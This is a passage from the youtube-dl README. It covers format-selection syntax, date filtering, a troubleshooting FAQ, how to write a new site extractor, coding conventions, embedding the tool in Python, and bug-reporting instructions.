$ youtube-dl -o "C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" https://videomore.ru/kino_v_detalayah/5_sezon/367617
# Stream the video being downloaded to stdout
$ youtube-dl -o - BaW_jenozKc
```
# FORMAT SELECTION
By default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**.
But sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more.
The general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download.
**tl;dr:** [navigate me to examples](#format-selection-examples).
The simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific.
You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file.
You can also use special names to select particular edge case formats:
- `best`: Select the best quality format represented by a single file with video and audio.
- `worst`: Select the worst quality format represented by a single file with video and audio.
- `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available.
- `worstvideo`: Select the worst quality video-only format. May not be available.
- `bestaudio`: Select the best quality audio only-format. May not be available.
- `worstaudio`: Select the worst quality audio only-format. May not be available.
For example, to download the worst quality video-only format you can use `-f worstvideo`.
If you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download.
If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`.
You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"`).
The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals):
- `filesize`: The number of bytes, if known in advance
- `width`: Width of the video, if known
- `height`: Height of the video, if known
- `tbr`: Average bitrate of audio and video in KBit/s
- `abr`: Average audio bitrate in KBit/s
- `vbr`: Average video bitrate in KBit/s
- `asr`: Audio sampling rate in Hertz
- `fps`: Frame rate
Also filtering work for comparisons `=` (equals), `!=` (not equals), `^=` (begins with), `$=` (ends with), `*=` (contains) and following string meta fields:
- `ext`: File extension
- `acodec`: Name of the audio codec in use
- `vcodec`: Name of the video codec in use
- `container`: Name of the container format
- `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`)
- `format_id`: A short description of the format
Note that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster.
Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "[height <=? 720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s.
You can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv.
Format selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`.
Since the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/rg3/youtube-dl/issues/5447), [#5456](https://github.com/rg3/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed.
If you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl.
#### Format selection examples
Note that on Windows you may need to use double quotes instead of single.
```bash
# Download best mp4 format available or any other best if no mp4 available
$ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best'
# Download best format available but not better that 480p
$ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]'
# Download best video only format but no bigger than 50 MB
$ youtube-dl -f 'best[filesize<50M]'
# Download best format available via direct link over HTTP/HTTPS protocol
$ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]'
# Download the best video format and the best audio format without merging them
$ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s'
```
Note that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name.
# VIDEO SELECTION
Videos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats:
- Absolute dates: Dates in the format `YYYYMMDD`.
- Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?`
Examples:
```bash
# Download only the videos uploaded in the last 6 months
$ youtube-dl --dateafter now-6months
# Download only the videos uploaded on January 1, 1970
$ youtube-dl --date 19700101
$ # Download only the videos uploaded in the 200x decade
$ youtube-dl --dateafter 20000101 --datebefore 20091231
```
# FAQ
### How do I update youtube-dl?
If you've followed [our manual installation instructions](https://rg3.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`).
If you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update.
If you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum.
As a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like
sudo apt-get remove -y youtube-dl
Afterwards, simply follow [our manual installation instructions](https://rg3.github.io/youtube-dl/download.html):
```
sudo wget https://yt-dl.org/latest/youtube-dl -O /usr/local/bin/youtube-dl
sudo chmod a+x /usr/local/bin/youtube-dl
hash -r
```
Again, from then on you'll be able to update with `sudo youtube-dl -U`.
### youtube-dl is extremely slow to start on Windows
Add a file exclusion for `youtube-dl.exe` in Windows Defender settings.
### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists
YouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos.
If you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:[email protected]?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update.
### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number`
Make sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any.
### Do I always have to pass `-citw`?
By default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`.
### Can you please put the `-b` option back?
Most people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it.
### I get HTTP error 402 when trying to download a video. What's this?
Apparently YouTube requires you to pass a CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/rg3/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl.
### Do I need any other programs?
youtube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or [ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option.
Videos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed.
### I have downloaded a video but how can I play it?
Once the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/).
### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser.
It depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`.
It may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule.
Please bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well.
If you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn.
### ERROR: no fmt_url_map or conn information found in video info
YouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### ERROR: unable to download video
YouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command`
That's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell).
For example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command:
```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'```
or
```youtube-dl https://www.youtube.com/watch?t=4\&v=BaW_jenozKc```
For Windows you have to use the double quotes:
```youtube-dl "https://www.youtube.com/watch?t=4&v=BaW_jenozKc"```
### ExtractorError: Could not find JS function u'OF'
In February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl.
### HTTP Error 429: Too Many Requests or 402: Payment Required
These two error codes indicate that the service is blocking your IP address because of overuse. Contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address.
### SyntaxError: Non-ASCII character
The error
File "youtube-dl", line 2
SyntaxError: Non-ASCII character '\x93' ...
means you're using an outdated version of Python. Please update to Python 2.6 or 2.7.
### What is this binary file? Where has the code gone?
Since June 2012 ([#342](https://github.com/rg3/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`.
### The exe throws an error due to missing `MSVCR100.dll`
To run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555).
### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files?
If you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome.
To make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\bin`, or `C:\Users\<User name>\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory.
From then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in.
### How do I put downloads into a specific folder?
Use the `-o` to specify an [output template](#output-template), for example `-o "/home/user/videos/%(title)s-%(id)s.%(ext)s"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration).
### How do I download a video starting with a `-`?
Either prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`:
youtube-dl -- -wNyEUrxzFU
youtube-dl "https://www.youtube.com/watch?v=-wNyEUrxzFU"
### How do I pass cookies to youtube-dl?
Use the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`.
In order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [cookies.txt](https://chrome.google.com/webstore/detail/cookiestxt/njabckikapfpffapmjgojcnbfjonfjfg) (for Chrome) or [Export Cookies](https://addons.mozilla.org/en-US/firefox/addon/export-cookies/) (for Firefox).
Note that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\r\n`) for Windows and `LF` (`\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format.
Passing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare).
### How do I stream directly to media player?
You will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with:
youtube-dl -o - "https://www.youtube.com/watch?v=BaW_jenozKcj" | vlc -
### How do I download only new videos from a playlist?
Use download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file.
For example, at first,
youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re"
will download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any:
youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re"
### Should I add `--hls-prefer-native` into my config?
When youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed.
When youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg.
In particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://rg3.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader.
If you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case.
### Can you add support for this anime video site, or site which shows current movies for free?
As a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl.
A note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A "fair use" note is equally unconvincing if the service shows copyright-protected videos in full without authorization.
Support requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content.
### How can I speed up work on my issue?
(Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do:
First of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel.
Please read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues.
If nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so).
Feel free to bump the issue from time to time by writing a small comment ("Issue is still present in youtube-dl version ...from France, but fixed from Belgium"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`.
### How can I detect whether a given URL is supported by youtube-dl?
For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug.
It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor.
If you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program.
# Why do I need to go through that much red tape when filing bugs?
Before we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said "please install ffmpeg", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl.
youtube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current.
# DEVELOPER INSTRUCTIONS
Most users do not need to build youtube-dl and can [download the builds](https://rg3.github.io/youtube-dl/download.html) or get them from their distribution.
To run youtube-dl as a developer, you don't need to build anything either. Simply execute
python -m youtube_dl
To run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work:
python -m unittest discover
python test/test_download.py
nosetests
See item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases.
If you want to create a build of youtube-dl yourself, you'll need
* python
* make (only GNU make is supported)
* pandoc
* zip
* nosetests
### Adding support for a new site
If you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**.
After you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`):
1. [Fork this repository](https://github.com/rg3/youtube-dl/fork)
2. Check out the source code with:
git clone [email protected]:YOUR_GITHUB_USERNAME/youtube-dl.git
3. Start a new git branch with
cd youtube-dl
git checkout -b yourextractor
4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`:
```python
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class YourExtractorIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?yourextractor\.com/watch/(?P<id>[0-9]+)'
_TEST = {
'url': 'https://yourextractor.com/watch/42',
'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)',
'info_dict': {
'id': '42',
'ext': 'mp4',
'title': 'Video title goes here',
'thumbnail': r're:^https?://.*\.jpg$',
# TODO more properties, either as:
# * A value
# * MD5 checksum; start the string with md5:
# * A regular expression; start the string with re:
# * Any Python type (for example int or float)
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
# TODO more code goes here, for example ...
title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title')
return {
'id': video_id,
'title': title,
'description': self._og_search_description(webpage),
'uploader': self._search_regex(r'<div[^>]+id="uploader"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False),
# TODO more properties (see youtube_dl/extractor/common.py)
}
```
5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/extractors.py).
6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in.
7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/common.py#L74-L252). Add tests and code for as many as you want.
8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](https://pypi.python.org/pypi/flake8). Also make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+.
9. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this:
$ git add youtube_dl/extractor/extractors.py
$ git add youtube_dl/extractor/yourextractor.py
$ git commit -m '[yourextractor] Add new extractor'
$ git push origin yourextractor
10. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it.
In any case, thank you very much for your contributions!
## youtube-dl coding conventions
This section introduces a guide lines for writing idiomatic, robust and future-proof extractor code.
Extractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all.
### Mandatory and optional metafields
For extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/common.py#L75-L257) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl:
- `id` (media identifier)
- `title` (media title)
- `url` (media download URL) or `formats`
In fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken.
[Any field](https://github.com/rg3/youtube-dl/blob/master/youtube_dl/extractor/common.py#L149-L257) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields.
#### Example
Say you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`:
```python
meta = self._download_json(url, video_id)
```
Assume at this point `meta`'s layout is:
```python
{
...
"summary": "some fancy summary text",
...
}
```
Assume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like:
```python
description = meta.get('summary') # correct
```
and not like:
```python
description = meta['summary'] # incorrect
```
The latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data).
Similarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance:
```python
description = self._search_regex(
r'<span[^>]+id="title"[^>]*>([^<]+)<',
webpage, 'description', fatal=False)
```
With `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction.
You can also pass `default=<some fallback value>`, for example:
```python
description = self._search_regex(
r'<span[^>]+id="title"[^>]*>([^<]+)<',
webpage, 'description', default=None)
```
On failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present.
### Provide fallbacks
When extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable.
#### Example
Say `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like:
```python
title = meta['title']
```
If `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected.
Assume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario:
```python
title = meta.get('title') or self._og_search_title(webpage)
```
This code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`.
### Make regular expressions flexible
When using regular expressions try to write them fuzzy and flexible.
#### Example
Say you need to extract `title` from the following HTML code:
```html
<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">some fancy title</span>
```
The code for that task should look similar to:
```python
title = self._search_regex(
r'<span[^>]+class="title"[^>]*>([^<]+)', webpage, 'title')
```
Or even better:
```python
title = self._search_regex(
r'<span[^>]+class=(["\'])title\1[^>]*>(?P<title>[^<]+)',
webpage, 'title', group='title')
```
Note how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute:
The code definitely should not look like:
```python
title = self._search_regex(
r'<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">(.*?)</span>',
webpage, 'title', group='title')
```
### Use safe conversion functions
Wrap all extracted numeric data into safe functions from `utils`: `int_or_none`, `float_or_none`. Use them for string to number conversions as well.
# EMBEDDING YOUTUBE-DL
youtube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/rg3/youtube-dl/issues/new).
From a Python program, you can embed youtube-dl in a more powerful fashion, like this:
```python
from __future__ import unicode_literals
import youtube_dl
ydl_opts = {}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])
```
Most likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/rg3/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object.
Here's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file:
```python
from __future__ import unicode_literals
import youtube_dl
class MyLogger(object):
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
print(msg)
def my_hook(d):
if d['status'] == 'finished':
print('Done downloading, now converting ...')
ydl_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}],
'logger': MyLogger(),
'progress_hooks': [my_hook],
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc'])
```
# BUGS
Bugs and suggestions should be reported at: <https://github.com/rg3/youtube-dl/issues>. Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)).
**Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \`\`\` for better formatting. It should look similar to this:
```
$ youtube-dl -v <your command line>
[debug] System config: []
[debug] User config: []
[debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj']
[debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251
[debug] youtube-dl version 2015.12.06
[debug] Git HEAD: 135392e
[debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2
[debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4
[debug] Proxy map: {}
...
```
**Do not post screenshots of verbose logs; only plain text is acceptable.**
The output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever.
Please re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist):
